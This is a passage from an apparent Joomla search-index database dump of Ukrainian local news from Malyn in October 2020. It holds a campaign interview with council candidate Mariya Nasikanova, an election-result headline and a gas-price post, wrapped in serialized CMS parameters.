адже більшість сільських рад мали свої власні фінансові ресурси, які  витрачались, приміром, на огорожу кладовищ, очистку вулиць, ремонт комунальних  доріг, то віднині це все ліквідовується і кошти акумулюватимуться в один  великий кошик, який називається «міський бюджет». І де гарантія, що ці кошти  будуть потрапляти й на розвиток сіл, а не на погашення заборгованості по  очистці води, на інші нагальні потреби міста? При ліквідації сільських рад село  залишається в невигідному становищі.</p><p>&nbsp;&nbsp;  Тому я, як людина, котра знає проблеми села, зможу, у разі потреби,  відстоювати його інтереси, вибивати той мінімальний пакет фінансування, при  якому село матиме змогу нормально жити й розвиватись.</p><p>&nbsp;&nbsp;&nbsp;&nbsp;  Багато років я мала справу з селом, працюючи і головою сільської ради, і  в районній раді, знаю і минуле, й нинішнє керівництво. Мені дороге село, я з  села вийшла і в село піду. Тож мені сьогодні шкода, що селяни можуть залишитись  незахищеними. Тому першим своїм завдання ставлю — захист сільських громад.</p><p>Кожне село — самобутнє, з  власними звичаями, які формувалися роками. Тому треба їх зберегти і примножити.  Щоб у сільських мешканців навіть не виникала думка, що вони в чомусь програли,  щоб вони почувались комфортно у великій малинській громаді</p><p><strong>А які бачите перспективи для міста?</strong></p><p>&nbsp;— Малин повинен стати зразковим європейським  містом. Для цього у нас хороший потенціал: географічне розташування, прекрасна  транспортна розв’язка. Потрібно залучати інвестиції у запуск нових і розвиток  старих підприємств, тобто все робити для створення робочих місць, розвитку  інфраструктури міста, житлово-комунального, медичного обслуговування,  покращення благоустрою.</p><p>—<strong>Інколи  про кандидата у депутати судять і по команді, в якій він знаходиться.</strong></p><p>— Наша команда — команда надійних  фахово підготовлених людей. Впевнена, що якщо вони пройдуть, то не будуть  просто займати депутатське місце, просто піднімати руку під час голосування, а  працюватимуть на совість. Серед них не тільки ті, хто добре знає проблеми села,  але й ті, кому не байдужа доля міста, своєї громади. Сьогодні у нашій команді є  керівники виробничих підрозділів, вчителі, лікарі, бухгалтера, робітники, воїни  АТО. У нас немає «товстих гаманців», ми не пов’язані з крупним бізнесом,  олігархами. Тож люди прийшли в нашу команду не захищати власний бізнес.</p><p>—  <strong>Для декого вибори — це шанс повернутись назад до влади. </strong></p><p>— Для нашої команди це не самоціль.  Ми не збираємось мірятись рейтингами з іншими політичними партіями, піаритись  на порожніх обіцянках, ми маємо намір працювати так, щоб люди жили заможніше і  почувались захищеними. Ми — команда однодумців, амбіційних людей, котрі вірять  у свої сили. Ці вибори — іспит для всіх: для політичних партій, для керівників  усіх рангів, для депутатів, для рядових працівників. Від нашого вибору залежить  стабільність у державі і якість нашого з вами життя.</p><p>&nbsp;&nbsp;&nbsp; Думаю, при виборі люди мають добре зважити,  як кандидат реалізував себе на попередньому місці роботи, які його конкретні  справи принесли користь людям та яку громадянську позицію він займає. Якщо  зробити такий аналіз, то стане зрозумілим, хто є хто. </p><p>—<strong>Що  ж, удачі Вам, а малинській громаді побажаємо зробити правильний вибір. </strong></p>\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-10-24 05:21:00\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"5\";s:8:\"ordering\";s:1:\"1\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:150:\"2483:mariya-nasikanova-ya-ne-zbirayus-piaritis-na-porozhnikh-obitsyankakh-a-pratsyuvati-tak-shchob-lyudi-u-malinskij-gromadi-pochuvalis-zakhishchenimi\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:172:\"/index.php/8-novini-2/2483-mariya-nasikanova-ya-ne-zbirayus-piaritis-na-porozhnikh-obitsyankakh-a-pratsyuvati-tak-shchob-lyudi-u-malinskij-gromadi-pochuvalis-zakhishchenimi\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2483\";s:5:\"route\";s:203:\"index.php?option=com_content&view=article&id=2483:mariya-nasikanova-ya-ne-zbirayus-piaritis-na-porozhnikh-obitsyankakh-a-pratsyuvati-tak-shchob-lyudi-u-malinskij-gromadi-pochuvalis-zakhishchenimi&catid=8\";s:5:\"title\";s:249:\"Марія Насіканова: «Я не збираюсь піаритись на порожніх обіцянках, а працювати так, щоб люди у малинській громаді почувались захищеними»\";s:11:\"description\";s:3473:\" Представляємо вам кандидата у депутати Малинської міської ради голову малинської організації партії «Європейська солідарність» Марію Насіканову. —Маріє Іванівно, нинішні вибори до органів місцевого самоврядування дуже відповідальні. У суспільства визрів запит на людей із досвідом у виробничій та управлінській сферах. Наскільки мені відомо, у Вас такого досвіду достатньо. —Так, із 39-ти років трудового стажу маю десять років педагогічного, весь інший час працювала в органах місцевого самоврядування — десять років головою сільської ради, затим в районній раді на різних посадах. Кожен день доводилось працювати з людьми, перейматись їхніми проблемами і щоразу вирішувати безліч питань. — Ви балотуєтесь у депутати обласної і міської ради? —Більше хочу пройти у міську раду, а дорогу в обласну дати молодим енергійним людям. У нас є такі кандидати. — Чому віддаєте перевагу депутатству в міській раді? — У першу чергу, хочу відстоювати права села. Ще й досі немає закону про старостинські округи, які не сформовані. Коли глибше аналізуєш ситуацію, складається враження, що заразвідбувається узурпація влади. Людей позбавили права самим обирати старосту села. Його будуть призначати. А це значить, що він не зможе відстоювати інтереси громади, проявляти власну ініціативу. Він буде маріонеткою або ж залежним від голови міської ради. Якщо староста комусь не сподобається, знайдеться тисячу причин його замінити на більш вигідну кандидатуру. Добре, аби старостою обирали місцевих. Місцева людина буде в курсі всіх справ сельчан, знатиме про потреби не тільки всієї громади, а й чи не кожної родини, кожної людини. Саме страшне в тому, що на посаду старости може потрапити стороння людина, якій байдуже доля селян. — А як фінансуватимуться сільські громади? Кошти, наскільки розумію, тепер будуть на рахунку малинської громади. Чи перепадатиме щось селу на вирішення найнеобхідніших проблем? \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-10-19 12:09:17\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-10-19 12:09:17\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4735,'index.php?option=com_content&view=article&id=2484','index.php?option=com_content&view=article&id=2484:5293-vibortsi-iz-11164-yaki-vzyali-uchast-u-golosuvanni-25-10-2020-roku-viddali-svij-golos-za-sitajla-oleksandra-grigorovicha&catid=8','5293 виборці із 11164, які взяли участь у голосуванні 25.10.2020 року, віддали свій голос за Ситайла Олександра Григоровича',' ','2020-10-29 18:38:57','3654ef5b042f6aba6e2dfc1f0e20909a',1,1,1,'*','2020-10-29 16:38:57','0000-00-00 00:00:00','2020-10-29 16:38:57','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2484\";s:5:\"alias\";s:125:\"5293-vibortsi-iz-11164-yaki-vzyali-uchast-u-golosuvanni-25-10-2020-roku-viddali-svij-golos-za-sitajla-oleksandra-grigorovicha\";s:7:\"summary\";s:165:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/mer.jpg\"><img src=\"https://malehus.in.ua/images/stories/mer.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-10-29 16:38:57\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:130:\"2484:5293-vibortsi-iz-11164-yaki-vzyali-uchast-u-golosuvanni-25-10-2020-roku-viddali-svij-golos-za-sitajla-oleksandra-grigorovicha\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:152:\"/index.php/8-novini-2/2484-5293-vibortsi-iz-11164-yaki-vzyali-uchast-u-golosuvanni-25-10-2020-roku-viddali-svij-golos-za-sitajla-oleksandra-grigorovicha\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2484\";s:5:\"route\";s:183:\"index.php?option=com_content&view=article&id=2484:5293-vibortsi-iz-11164-yaki-vzyali-uchast-u-golosuvanni-25-10-2020-roku-viddali-svij-golos-za-sitajla-oleksandra-grigorovicha&catid=8\";s:5:\"title\";s:208:\"5293 виборці із 11164, які взяли участь у голосуванні 25.10.2020 року, віддали свій голос за Ситайла Олександра Григоровича\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-10-29 16:38:57\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-10-29 16:38:57\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4736,'index.php?option=com_content&view=article&id=2485','index.php?option=com_content&view=article&id=2485:vartist-prirodnogo-gazu-v-listopadi-2020-roku-v-rozrizi-postachalnikiv&catid=8','Вартість природного газу в листопаді 2020 року в розрізі постачальників',' за матеріалами https://gazpravda.com.ua/ ','2020-10-31 12:59:40','7db218952cea93e0aebb4185ff50c4ea',1,1,1,'*','2020-10-31 10:59:40','0000-00-00 00:00:00','2020-10-31 10:59:40','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2485\";s:5:\"alias\";s:70:\"vartist-prirodnogo-gazu-v-listopadi-2020-roku-v-rozrizi-postachalnikiv\";s:7:\"summary\";s:280:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gaz11_20.jpg\"><img src=\"https://malehus.in.ua/images/stories/gaz11_20.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a></p><p>за матеріалами&nbsp;<a href=\"https://gazpravda.com.ua/\">https://gazpravda.com.ua/</a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-10-31 10:59:40\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:75:\"2485:vartist-prirodnogo-gazu-v-listopadi-2020-roku-v-rozrizi-postachalnikiv\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:97:\"/index.php/8-novini-2/2485-vartist-prirodnogo-gazu-v-listopadi-2020-roku-v-rozrizi-postachalnikiv\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s